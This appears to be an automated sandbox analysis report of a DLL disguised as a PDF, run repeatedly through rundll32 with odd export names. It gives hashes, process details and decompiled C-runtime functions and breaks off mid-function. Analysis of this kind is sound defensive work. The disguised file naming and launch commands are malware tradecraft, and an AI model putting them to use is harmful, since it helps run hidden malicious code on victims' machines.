Commandline:	rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,DeathBroad
Imagebase:	0xa30000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6284 Parent PID: 6092

General

Start time:	11:56:08
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,DllRegisterServer
Imagebase:	0xa30000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6528 Parent PID: 6092

General

Start time:	11:56:12
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Meetfinish
Imagebase:	0xa30000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6564 Parent PID: 6092

General

Start time:	11:56:16
Start date:	07/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\606d810b8ff92.pdf.dll,Mouththese
Imagebase:	0xa30000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6092 Parent PID: 5708 loaddll32.exeCOMMON

Executed Functions

Function 6E1A9B76, Relevance: 12.1, APIs: 8, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1A9B76(void* __edx, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t57;
				void* _t60;
				void* _t67;
				signed int _t70;
				void* _t73;
				signed int _t74;
				signed int _t78;
				void* _t80;

				_t67 = __edx;
				E6E1AA7D0(0x6e216838, 0x10);
				_t34 =  *0x6e2217c4; // 0x1
				if(_t34 > 0) {
					 *0x6e2217c4 = _t34 - 1;
					 *(_t80 - 0x1c) = 1;
					 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
					 *((char*)(_t80 - 0x20)) = E6E1A96E2();
					 *(_t80 - 4) = 1;
					__eflags =  *0x6e2217a0 - 2;
					if( *0x6e2217a0 != 2) {
						E6E1AA3EC(_t67, 1, _t73, 7);
						asm("int3");
						E6E1AA7D0(0x6e216860, 0xc);
						_t70 =  *(_t80 + 0xc);
						__eflags = _t70;
						if(_t70 != 0) {
							L9:
							 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
							__eflags = _t70 - 1;
							if(_t70 == 1) {
								L12:
								_t57 =  *(_t80 + 0x10);
								_t74 = E6E1A9D31( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
								 *(_t80 - 0x1c) = _t74;
								__eflags = _t74;
								if(_t74 != 0) {
									_t41 = E6E1A9A1C(_t60,  *((intOrPtr*)(_t80 + 8)), _t70, _t57); // executed
									_t74 = _t41;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t74;
									if(__eflags != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t70 - 2;
								if(__eflags == 0) {
									goto L12;
								} else {
									_t57 =  *(_t80 + 0x10);
									L14:
									_push(_t57);
									_push(_t70);
									_push( *((intOrPtr*)(_t80 + 8)));
									_t42 = E6E17D580(_t57, _t70, _t74, __eflags);
									_t74 = _t42;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t70 - 1;
									if(_t70 == 1) {
										__eflags = _t74;
										if(__eflags == 0) {
											_push(_t57);
											_push(_t42);
											_push( *((intOrPtr*)(_t80 + 8)));
											_t45 = E6E17D580(_t57, _t70, _t74, __eflags);
											__eflags = _t57;
											_t25 = _t57 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6E1A9B76(_t67, _t25);
											_pop(_t60);
											E6E1A9D31( *((intOrPtr*)(_t80 + 8)), _t74, _t57);
										}
									}
									__eflags = _t70;
									if(_t70 == 0) {
										L19:
										_t74 = E6E1A9A1C(_t60,  *((intOrPtr*)(_t80 + 8)), _t70, _t57);
										 *(_t80 - 0x1c) = _t74;
										__eflags = _t74;
										if(_t74 != 0) {
											_t74 = E6E1A9D31( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
											 *(_t80 - 0x1c) = _t74;
										}
									} else {
										__eflags = _t70 - 3;
										if(_t70 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t80 - 4) = 0xfffffffe;
							_t40 = _t74;
						} else {
							__eflags =  *0x6e2217c4 - _t70; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
						return _t40;
					} else {
						E6E1A97AD(_t60);
						E6E1AA8CC();
						E6E1AA92D();
						 *0x6e2217a0 =  *0x6e2217a0 & 0x00000000;
						 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
						E6E1A9C0B();
						_t54 = E6E1A994E(_t60,  *((intOrPtr*)(_t80 + 8)), 0);
						asm("sbb esi, esi");
						_t78 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t78;
						 *(_t80 - 0x1c) = _t78;
						 *(_t80 - 4) = 0xfffffffe;
						E6E1A9C18();
						_t56 = _t78;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
					return _t56;
				}
			}

0x6e1a9b76
0x6e1a9b7d
0x6e1a9b82
0x6e1a9b89
0x6e1a9b90
0x6e1a9b98
0x6e1a9b9b
0x6e1a9ba4
0x6e1a9ba7
0x6e1a9baa
0x6e1a9bb1
0x6e1a9c20
0x6e1a9c25
0x6e1a9c2d
0x6e1a9c32
0x6e1a9c35
0x6e1a9c37
0x6e1a9c48
0x6e1a9c48
0x6e1a9c4c
0x6e1a9c4f
0x6e1a9c5b
0x6e1a9c5b
0x6e1a9c68
0x6e1a9c6a
0x6e1a9c6d
0x6e1a9c6f
0x6e1a9c7a
0x6e1a9c7f
0x6e1a9c81
0x6e1a9c84
0x6e1a9c86
0x00000000
0x00000000
0x6e1a9c86
0x6e1a9c51
0x6e1a9c51
0x6e1a9c54
0x00000000
0x6e1a9c56
0x6e1a9c56
0x6e1a9c8c
0x6e1a9c8c
0x6e1a9c8d
0x6e1a9c8e
0x6e1a9c91
0x6e1a9c96
0x6e1a9c98
0x6e1a9c9b
0x6e1a9c9e
0x6e1a9ca0
0x6e1a9ca2
0x6e1a9ca4
0x6e1a9ca5
0x6e1a9ca6
0x6e1a9ca9
0x6e1a9cae
0x6e1a9cb0
0x6e1a9cb0
0x6e1a9cb6
0x6e1a9cb7
0x6e1a9cbc
0x6e1a9cc2
0x6e1a9cc2
0x6e1a9ca2
0x6e1a9cc7
0x6e1a9cc9
0x6e1a9cd0
0x6e1a9cda
0x6e1a9cdc
0x6e1a9cdf
0x6e1a9ce1
0x6e1a9ced
0x6e1a9d15
0x6e1a9d15
0x6e1a9ccb
0x6e1a9ccb
0x6e1a9cce
0x00000000
0x00000000
0x6e1a9cce
0x6e1a9cc9
0x6e1a9c54
0x6e1a9d18
0x6e1a9d1f
0x6e1a9c39
0x6e1a9c39
0x6e1a9c3f
0x00000000
0x6e1a9c41
0x6e1a9c41
0x6e1a9c41
0x6e1a9c3f
0x6e1a9d24
0x6e1a9d30
0x6e1a9bb3
0x6e1a9bb3
0x6e1a9bb8
0x6e1a9bbd
0x6e1a9bc2
0x6e1a9bc9
0x6e1a9bcd
0x6e1a9bd7
0x6e1a9be3
0x6e1a9be5
0x6e1a9be5
0x6e1a9be7
0x6e1a9bea
0x6e1a9bf1
0x6e1a9bf6
0x00000000
0x6e1a9bf6
0x6e1a9b8b
0x6e1a9b8b
0x6e1a9bf8
0x6e1a9bfb
0x6e1a9c07
0x6e1a9c07

APIs

__RTC_Initialize.LIBCMT ref: 6E1A9BBD
___scrt_uninitialize_crt.LIBCMT ref: 6E1A9BD7

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 5330e8f9a53b38e0a2f46355bf09568b6880469df51fd80e04492b4ab533fa62
Instruction ID: e9baa49ad2d71118058f3f29df3f28bc3bf290fc470eaf4321163746bfdfad5f
Opcode Fuzzy Hash: 5330e8f9a53b38e0a2f46355bf09568b6880469df51fd80e04492b4ab533fa62
Instruction Fuzzy Hash: B041F776D04619AFDB11CFDCE850BFE7AB9EF80754F214419EA156B240C73249C1ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A9C26, Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6E1A9C63
dllmain_crt_dispatch.LIBCMT ref: 6E1A9C7A
dllmain_raw.LIBCMT ref: 6E1A9CC2
dllmain_crt_dispatch.LIBCMT ref: 6E1A9CD5
dllmain_raw.LIBCMT ref: 6E1A9CE8

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 6dee2fdb2fe5cdcda32d08f8573217e900afa5b6af788149448fa8acb4a09677
Instruction ID: 1d3f9184089c0f3c08532412a14e0f8784980008682851074bf2aa987facd479
Opcode Fuzzy Hash: 6dee2fdb2fe5cdcda32d08f8573217e900afa5b6af788149448fa8acb4a09677
Instruction Fuzzy Hash: 0E21D876D0061AAFCB62CEDDD8509BF3AB9DB90794F214415F9146B214C3328DC1ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A9A6F, Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6E1A9ABC

Part of subcall function 6E1AA8C0: InitializeSListHead.KERNEL32(6E221B00,6E1A9AC6,6E216818,00000010,6E1A9A57,?,?,?,6E1A9C7F,?,00000001,?,?,00000001,?,6E216860), ref: 6E1AA8C5

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E1A9B26
___scrt_fastfail.LIBCMT ref: 6E1A9B70

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: c1394aebb59c54e0c48d0672d5b82f3768cc76f0000bf6db2ebcea4dca6ad151
Instruction ID: 10a04bddef8717461bed8662badc3d5d8eb3e14f8310650cf0ec0c92a26fcf10
Opcode Fuzzy Hash: c1394aebb59c54e0c48d0672d5b82f3768cc76f0000bf6db2ebcea4dca6ad151
Instruction Fuzzy Hash: 1321D4395486059EDF009BFCA825FFD37A6AF1226DF200C15D6526B1C1DB2305C4FBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6E18FB55, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E18FB5C
std::locale::_Init.LIBCPMT ref: 6E18FB7D

Part of subcall function 6E1911F3: __EH_prolog3.LIBCMT ref: 6E1911FA
Part of subcall function 6E1911F3: std::_Lockit::_Lockit.LIBCPMT ref: 6E191205
Part of subcall function 6E1911F3: std::locale::_Setgloballocale.LIBCPMT ref: 6E191220
Part of subcall function 6E1911F3: _Yarn.LIBCPMT ref: 6E191236
Part of subcall function 6E1911F3: std::_Lockit::~_Lockit.LIBCPMT ref: 6E191276

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: e694a0c4611a81984663db837e595fce2248b7d3e91a4dd8c260b1e6a7a0621e
Instruction ID: 09987e9762f7f90e9a188363d40d714d3fa9c6d58b2f85fbe32e05a0ac100dca
Opcode Fuzzy Hash: e694a0c4611a81984663db837e595fce2248b7d3e91a4dd8c260b1e6a7a0621e
Instruction Fuzzy Hash: BCE0DF36A11A115BD211ABECA4213ADB6997F88B24F710409E521AF680CFB18DC0BB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E28DC, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D16BE: RtlAllocateHeap.NTDLL(00000008,00000010,00000000,?,6E1CF8EB,00000001,00000364,00000007,000000FF,?,6E1C23F9,6E1D1C61,00000001,?,6E1A963B,6E17DCEA), ref: 6E1D16FF

_free.LIBCMT ref: 6E1E294B

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: b36aea478ff93b338b4ecc60a2f5c6d0917d8d8ea34a2683621066b10f7ce7c8
Instruction ID: 7445e2fd4854d264fcf7fad884d9e99e0062e74bcec274f3f4c38af80e4c1ff4
Opcode Fuzzy Hash: b36aea478ff93b338b4ecc60a2f5c6d0917d8d8ea34a2683621066b10f7ce7c8
Instruction Fuzzy Hash: E80126726043666BC320CFD8C8909CAFBA8FB053B0F150A29E556B76C0E7706894C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D16BE, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000010,00000000,?,6E1CF8EB,00000001,00000364,00000007,000000FF,?,6E1C23F9,6E1D1C61,00000001,?,6E1A963B,6E17DCEA), ref: 6E1D16FF

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 69b2058982d11b048875696abe8a8f32ced44b9224579d81ee3f323e19aff4d4
Instruction ID: 83a5510ecc080a0dbb65f974bdeecef91a58e63cee46ebc0fa59ab773b43f5d0
Opcode Fuzzy Hash: 69b2058982d11b048875696abe8a8f32ced44b9224579d81ee3f323e19aff4d4
Instruction Fuzzy Hash: 92F024363046355BEB518BEA8814E8B376DAB52670B258511EE24D7090CB60D9CCB6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E192FA1, Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(?,?,6E1913C8,6E191439,?,6E191225,00000000,00000000,00000000,00000004,6E17F9C2,00000001,00000004,6E17E827,00000008,6E17DD7A), ref: 6E192FB4

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: ae206b68ced150e32a381ad06cd9b966016a2d4ecc4ad1bbc4ec21322cf6a0da
Instruction ID: 47c0e5935ced61e686b5ed487e6976646d3b802fce5495202af9939cbc35ffe0
Opcode Fuzzy Hash: ae206b68ced150e32a381ad06cd9b966016a2d4ecc4ad1bbc4ec21322cf6a0da
Instruction Fuzzy Hash: A3D0C771048D08DFCF086F54E99DA643BA6F716355F10412CF60D41650CF7557E8DB55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E1AFEC7, Relevance: 58.9, APIs: 32, Strings: 1, Instructions: 1115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E6E1AFEC7(signed int* _a4, signed int* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				char* _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				signed int _v36;
				signed int _v40;
				char _v48;
				signed int _v52;
				char* _v56;
				signed int _v60;
				void* _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				char* _v96;
				signed int _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				void* __ebx;
				void* __edi;
				intOrPtr _t404;
				signed int _t406;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t418;
				signed int _t421;
				signed int _t422;
				signed int _t424;
				intOrPtr* _t427;
				signed int _t429;
				signed int _t430;
				signed int _t433;
				signed int _t434;
				signed int* _t435;
				unsigned int _t446;
				signed char _t448;
				unsigned int _t449;
				signed char _t451;
				signed int _t457;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t496;
				signed int _t500;
				signed int _t507;
				signed int _t514;
				signed int _t519;
				signed int _t524;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed char _t543;
				signed int* _t547;
				signed int _t548;
				intOrPtr* _t550;
				signed int _t552;
				unsigned int _t559;
				signed char _t561;
				void* _t563;
				unsigned int _t568;
				signed char _t570;
				unsigned int _t577;
				signed char _t579;
				signed int _t583;
				void* _t586;
				char** _t614;
				void* _t618;
				void* _t622;
				intOrPtr* _t625;
				signed int _t627;
				signed int* _t632;
				signed int _t638;
				signed int _t642;
				void* _t655;
				signed char _t670;
				signed char _t673;
				char** _t678;
				void* _t681;
				intOrPtr* _t689;
				intOrPtr* _t692;
				signed int* _t695;
				signed int _t696;
				signed int _t697;
				signed int _t700;
				signed int _t701;
				signed int _t706;
				signed int _t717;
				signed int _t719;
				signed int _t724;
				signed int _t726;
				signed int _t727;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t742;
				signed int _t745;
				signed int _t748;
				signed int _t750;
				signed int _t761;
				unsigned int _t762;
				signed int _t770;
				char** _t793;
				signed char _t811;
				void* _t830;
				signed int _t833;
				unsigned int _t844;
				signed int* _t853;
				signed int _t854;
				signed int _t855;
				signed int _t861;
				signed int _t863;
				void* _t864;
				signed int _t867;
				signed int _t868;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t875;
				signed int _t879;
				signed int _t881;
				void* _t884;

				_t404 =  *0x6e221b68; // 0x0
				_t867 = 0;
				_v100 = _t404 -  *0x6e221b6c;
				_v20 = 0;
				_v16 = 0;
				_t406 = E6E1B4C55();
				_t853 = _a8;
				_t696 = _t406;
				_t697 =  *_t853;
				if(_t697 == 0) {
					L2:
					_v92 = _t867;
					L3:
					if(_t696 == 0xffff) {
						_t695 = _a4;
						_t695[1] = _t867;
						_t695[1] = 2;
						 *_t695 = _t867;
						return _t695;
					}
					__eflags = _t696 - 0xfffe;
					if(_t696 == 0xfffe) {
						E6E1AFB49(_t697, _a4, 1, _t853);
						return _a4;
					}
					__eflags = _t696 - 0xfffd;
					if(_t696 == 0xfffd) {
						_t692 = _a4;
						 *_t692 = _t697;
						_t16 = _t853 + 4; // 0x4488b0f
						 *((intOrPtr*)(_t692 + 4)) =  *_t16;
						return _t692;
					}
					_t871 = _t696 & 0x00008000;
					__eflags = _t871;
					_v40 = _t871;
					if(_t871 == 0) {
						L98:
						E6E1AFC87( &_v20, _t853);
						__eflags = _t871;
						if(_t871 != 0) {
							L104:
							__eflags = (_t696 & 0x0000fc00) - 0x7c00;
							if(__eflags != 0) {
								_t868 = _v40;
								_t872 = _t696;
								_t854 = _t696;
								__eflags = _t868;
								if(__eflags == 0) {
									_t855 = _t854 & 0x00006000;
									_t412 = 0;
									_t413 = _t412 & 0xffffff00 | __eflags == 0x00000000;
									_t873 = _t872 & 0x00001800;
									__eflags = _t873;
								} else {
									_t873 = _t872 & 0x00001800;
									__eflags = _t873 - 0x800;
									_t413 = 0 | _t873 == 0x00000800;
									_t855 = _t854 & 0x00006000;
								}
								__eflags = _t413;
								_v28 = _t855;
								_t700 = _t696;
								_t414 = _t696;
								if(_t413 == 0) {
									_t415 = _t414 & 0x00001000;
									_t701 = _t700 & 0x00000400;
									__eflags = _t701;
									_v40 = _t701;
									_v36 = _t415;
								} else {
									_t415 = _t414 & 0x00000400;
									_v40 = _t415;
									_v36 = _t700 & 0x00001000;
								}
								__eflags = _t415;
								if(_t415 == 0) {
									L117:
									__eflags = _t868;
									if(_t868 == 0) {
										__eflags = _t855;
									} else {
										__eflags = _t873 - 0x800;
									}
									__eflags = 0 | __eflags == 0x00000000;
									_t418 = _v40;
									if(__eflags == 0) {
										_t418 = _v36;
									}
									__eflags = _t418;
									if(_t418 == 0) {
										L125:
										__eflags = _t868;
										if(_t868 == 0) {
											__eflags = _t855;
										} else {
											__eflags = _t873 - 0x800;
										}
										__eflags = 0 | __eflags == 0x00000000;
										_t421 = _v40;
										if(__eflags == 0) {
											_t421 = _v36;
										}
										__eflags = _t421;
										if(_t421 == 0) {
											L141:
											__eflags = _t868;
											if(_t868 != 0) {
												goto L134;
											}
											__eflags = (_t696 & 0x00007c00) - 0x7800;
											if((_t696 & 0x00007c00) == 0x7800) {
												goto L223;
											}
											goto L143;
										} else {
											asm("sbb eax, eax");
											_t507 =  ~((_t696 & 0x00001b00) - 0x1200) + 1;
											_t745 =  ~_t868;
											asm("sbb ecx, ecx");
											__eflags = _t507 & _t745;
											if((_t507 & _t745) == 0) {
												goto L141;
											}
											_v12 = "`template static data member destructor helper\'";
											_v8 = 0x2f;
											goto L133;
										}
									} else {
										asm("sbb eax, eax");
										_t514 =  ~((_t696 & 0x00001b00) - 0x1100) + 1;
										_t748 =  ~_t868;
										asm("sbb ecx, ecx");
										__eflags = _t514 & _t748;
										if((_t514 & _t748) == 0) {
											goto L125;
										}
										_v12 = "`template static data member constructor helper\'";
										_v8 = 0x30;
										goto L133;
									}
								} else {
									asm("sbb eax, eax");
									_t519 =  ~((_t696 & 0x00001b00) - 0x1000) + 1;
									_t750 =  ~_t868;
									asm("sbb ecx, ecx");
									__eflags = _t519 & _t750;
									if((_t519 & _t750) == 0) {
										goto L117;
									}
									_v12 = "`local static destructor helper\'";
									_v8 = 0x20;
									L133:
									E6E1AFC2F( &_v20,  &_v12);
									__eflags = _t868;
									if(_t868 == 0) {
										L143:
										_t422 = 0;
										__eflags = _v28;
										L135:
										__eflags = _t422 & 0xffffff00 | __eflags == 0x00000000;
										_t424 = _v40;
										if(__eflags == 0) {
											_t424 = _v36;
										}
										__eflags = _t424;
										if(_t424 == 0) {
											L144:
											_t427 = E6E1B28E2(_t696,  &_v48,  &_v20);
											goto L145;
										} else {
											_t863 = _t696 & 0x00001b00;
											__eflags = _t863 - 0x1100;
											_t496 = 0 | _t863 == 0x00001100;
											_t742 =  ~_t868;
											asm("sbb ecx, ecx");
											__eflags = _t496 & _t742;
											if((_t496 & _t742) != 0) {
												L140:
												_t427 = E6E1AFB1E(_t742,  &_v48, 0x20,  &_v20);
												L145:
												_v16 =  *((intOrPtr*)(_t427 + 4));
												_v20 =  *_t427;
												__eflags = _t868;
												if(__eflags == 0) {
													_t706 = _t696 & 0x00006000;
													_t429 = 0;
													_t430 = _t429 & 0xffffff00 | __eflags == 0x00000000;
													_t875 = _t696 & 0x00001800;
													__eflags = _t875;
													goto L148;
												}
												goto L146;
											}
											__eflags = _t863 - 0x1200;
											_t500 = 0 | _t863 == 0x00001200;
											_t742 =  ~_t868;
											asm("sbb ecx, ecx");
											__eflags = _t500 & _t742;
											if((_t500 & _t742) == 0) {
												goto L144;
											}
											goto L140;
										}
									}
									L134:
									_t422 = 0;
									__eflags = _t873 - 0x800;
									goto L135;
								}
							}
							E6E1B528D(0x7c00, _t853, __eflags, _a4,  &_v20);
							L106:
							L107:
							_t435 = _a4;
							goto L224;
						}
						_t524 = _t696 & 0x00007c00;
						__eflags = _t524 - 0x6800;
						if(_t524 == 0x6800) {
							L103:
							E6E1B52EE(_a4,  &_v20);
							goto L106;
						}
						__eflags = _t524 - 0x7000;
						if(_t524 == 0x7000) {
							goto L103;
						}
						__eflags = _t524 - 0x6000;
						if(_t524 != 0x6000) {
							goto L104;
						}
						_v12 = _v20;
						_v56 = "}\'";
						_v52 = 2;
						_v8 = _v16;
						E6E1AFCDE( &_v12, 0x7b);
						E6E1B22EF(_t853, _t867,  &_v80, _t867);
						E6E1AFB6B(E6E1AFB8D( &_v12,  &_v48,  &_v80), _a4,  &_v56);
						goto L107;
					} else {
						_t536 = _t696;
						_t761 = _t696 & 0x00001800;
						_v36 = _t761;
						__eflags = _t761 - 0x800;
						if(_t761 != 0x800) {
							_t537 = _t536 & 0x00001000;
							_v24 = _t696;
							_t25 =  &_v24;
							 *_t25 = _v24 & 0x00000400;
							__eflags =  *_t25;
							_v68 = _t537;
						} else {
							_t537 = _t536 & 0x00000400;
							_v68 = _t696;
							_v68 = _v68 & 0x00001000;
							_v24 = _t537;
						}
						__eflags = _t537;
						_t538 = _t696;
						if(_t537 == 0) {
							L16:
							_t539 = _t538 & 0x00001b00;
							__eflags = _t761 - 0x800;
							if(_t761 != 0x800) {
								_v60 = _v68;
								_t871 = _v40;
							} else {
								_v60 = _v24;
								_t853 = _a8;
							}
							__eflags = _v60 - _t867;
							if(_v60 == _t867) {
								L22:
								__eflags = _t696 & 0x00004000;
								if((_t696 & 0x00004000) != 0) {
									_t844 =  *0x6e221b70; // 0x0
									_t848 =  !((_t844 >> 0x00000002 |  *0x6e221b70) >> 1);
									_push( &_v12);
									__eflags =  !((_t844 >> 0x00000002 |  *0x6e221b70) >> 1) & 0x00000001;
									if(__eflags == 0) {
										E6E1AFE15( &_v20, E6E1B116E(_t853, __eflags));
									} else {
										_t689 = E6E1AFB1E(_t848,  &_v56, 0x20, E6E1B116E(_t853, __eflags));
										_t884 = _t884 + 0x10;
										_v20 =  *_t689;
										_v16 =  *((intOrPtr*)(_t689 + 4));
									}
